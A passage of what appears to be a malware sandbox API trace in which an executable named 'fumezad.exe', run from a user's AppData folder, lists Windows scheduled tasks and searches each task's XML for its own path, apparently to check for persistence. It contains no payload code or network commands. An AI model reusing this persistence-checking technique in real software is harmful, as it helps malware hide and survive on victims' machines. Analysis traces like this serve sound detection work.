ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n") returned 0x0 [0138.188] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Tcpip\\IpAddressConflict2\r\n 2006-02-23T15:00:57\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)\r\n $(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)\r\n \r\n \r\n \r\n 2006-02-23T16:27:43\r\n true\r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*[System[Provider[@Name='Tcpip'] and EventID=4199]]</Select></Query></QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n IgnoreNew\r\n true\r\n true\r\n true\r\n false\r\n false\r\n true\r\n true\r\n false\r\n false\r\n false\r\n 7\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.189] IUnknown:Release (This=0x127080) returned 0x0 [0138.189] IUnknown:Release (This=0x126f30) returned 0x0 [0138.189] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.190] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.190] IUnknown:Release (This=0x126f30) returned 0x0 [0138.190] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.190] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x24, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.190] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.193] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.193] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0138.193] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="MsCtfMonitor") returned 0x0 [0138.193] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n") returned 0x0 [0138.195] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)\r\n Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor\r\n $(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)\r\n \r\n \r\n \r\n true\r\n \r\n \r\n \r\n Parallel\r\n false\r\n false\r\n true\r\n false\r\n false\r\n true\r\n true\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.196] IUnknown:Release (This=0x1270c0) returned 0x0 [0138.196] IUnknown:Release (This=0x126f50) returned 0x0 [0138.196] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.197] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.197] IUnknown:Release (This=0x126f50) returned 0x0 [0138.197] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.197] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x25, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.197] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.199] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.199] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0138.199] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="SynchronizeTime") returned 0x0 [0138.199] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n") returned 0x0 [0138.201] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\w32time.dll,-200)\r\n $(@%systemroot%\\system32\\w32time.dll,-202)\r\n $(@%systemroot%\\system32\\w32time.dll,-201)\r\n Microsoft\\Windows\\Time Synchronization\\SynchronizeTime\r\n \r\n \r\n \r\n 2005-01-01T01:00:00\r\n true\r\n \r\n \r\n \r\n \r\n 1\r\n \r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n IgnoreNew\r\n false\r\n true\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n \r\n \r\n S-1-5-19\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\sc.exe\r\n start w32time task_started\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.201] IUnknown:Release (This=0x1270b0) returned 0x0 [0138.201] IUnknown:Release (This=0x126f50) returned 0x0 [0138.201] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.203] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.203] IUnknown:Release (This=0x126f50) returned 0x0 [0138.203] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.203] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x26, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.203] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.204] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.205] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127070) returned 0x0 [0138.205] IRegisteredTask:get_Name (in: This=0x127070, pName=0x24da80 | out: pName=0x24da80*="UPnPHostConfig") returned 0x0 [0138.205] IRegisteredTask:get_Xml (in: This=0x127070, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n") returned 0x0 [0138.207] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\upnphost.dll,-215)\r\n $(@%systemroot%\\system32\\upnphost.dll,-216)\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)\r\n Microsoft\\Windows\\UPnP\\UPnPHostConfig\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n true\r\n \r\n \r\n \r\n sc.exe\r\n config upnphost start= auto\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.207] IUnknown:Release (This=0x127070) returned 0x0 [0138.207] IUnknown:Release (This=0x126f30) returned 0x0 [0138.207] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.209] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.209] IUnknown:Release (This=0x126f30) returned 0x0 [0138.209] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.209] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x27, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.209] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.211] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.211] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0138.211] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="HiveUploadTask") returned 0x0 [0138.211] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0138.214] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.214] IUnknown:Release (This=0x1270b0) returned 0x0 [0138.214] IUnknown:Release (This=0x126f50) returned 0x0 [0138.214] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.215] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.215] IUnknown:Release (This=0x126f50) returned 0x0 [0138.215] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.215] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.215] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f30) returned 0x0 [0138.217] IRegisteredTaskCollection:get_Count (in: This=0x126f30, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.217] IRegisteredTaskCollection:get_Item (in: This=0x126f30, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127070) returned 0x0 [0138.217] IRegisteredTask:get_Name (in: This=0x127070, pName=0x24da80 | out: pName=0x24da80*="ResolutionHost") returned 0x0 [0138.217] IRegisteredTask:get_Xml (in: This=0x127070, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n") returned 0x0 [0138.220] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.220] IUnknown:Release (This=0x127070) returned 0x0 [0138.220] IUnknown:Release (This=0x126f30) returned 0x0 [0138.220] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f30) returned 0x0 [0138.221] ITaskFolderCollection:get_Count (in: This=0x126f30, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.221] IUnknown:Release (This=0x126f30) returned 0x0 [0138.221] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.221] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.222] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.223] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.223] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0138.223] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="QueueReporting") returned 0x0 [0138.223] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n") returned 0x0 [0138.226] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.226] IUnknown:Release (This=0x1270c0) returned 0x0 [0138.226] IUnknown:Release (This=0x126f50) returned 0x0 [0138.226] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.227] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.227] IUnknown:Release (This=0x126f50) returned 0x0 [0138.227] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.227] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.227] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f60) returned 0x0 [0138.229] IRegisteredTaskCollection:get_Count (in: This=0x126f60, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.229] IRegisteredTaskCollection:get_Item (in: This=0x126f60, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270d0) returned 0x0 [0138.229] IRegisteredTask:get_Name (in: This=0x1270d0, pName=0x24da80 | out: pName=0x24da80*="BfeOnServiceStartTypeChange") returned 0x0 [0138.229] IRegisteredTask:get_Xml (in: This=0x1270d0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0138.234] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.235] IUnknown:Release (This=0x1270d0) returned 0x0 [0138.235] IUnknown:Release (This=0x126f60) returned 0x0 [0138.235] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f60) returned 0x0 [0138.238] ITaskFolderCollection:get_Count (in: This=0x126f60, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.238] IUnknown:Release (This=0x126f60) returned 0x0 [0138.238] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.238] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.238] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f50) returned 0x0 [0138.240] IRegisteredTaskCollection:get_Count (in: This=0x126f50, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.240] IRegisteredTaskCollection:get_Item (in: This=0x126f50, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270c0) returned 0x0 [0138.240] IRegisteredTask:get_Name (in: This=0x1270c0, pName=0x24da80 | out: pName=0x24da80*="UpdateLibrary") returned 0x0 [0138.240] IRegisteredTask:get_Xml (in: This=0x1270c0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n") returned 0x0 [0138.243] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0138.243] IUnknown:Release (This=0x1270c0) returned 0x0 [0138.243] IUnknown:Release (This=0x126f50) returned 0x0 [0138.243] ITaskFolder:GetFolders (in: This=0x126ea0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f50) returned 0x0 [0138.244] ITaskFolderCollection:get_Count (in: This=0x126f50, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0138.244] IUnknown:Release (This=0x126f50) returned 0x0 [0138.244] TaskScheduler:IUnknown:Release (This=0x126ea0) returned 0x0 [0138.244] ITaskFolderCollection:get_Item (in: This=0x126d50, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x126ea0) returned 0x0 [0138.244] ITaskFolder:GetTasks (in: This=0x126ea0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f40) returned 0x0 [0138.246] IRegisteredTaskCollection:get_Count (in: This=0x126f40, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0138.246] IRegisteredTaskCollection:get_Item (in: This=0x126f40, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270a0) returned 0x0 [0138.246] IRegisteredTask:get_Name (in: This=0x1270a0, pName=0x24da80 | out: pName=0x24da80*="ConfigNotification") returned 0x0 [0138.246] IRegisteredTask:get_Xml (in: This=0x1270a0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n 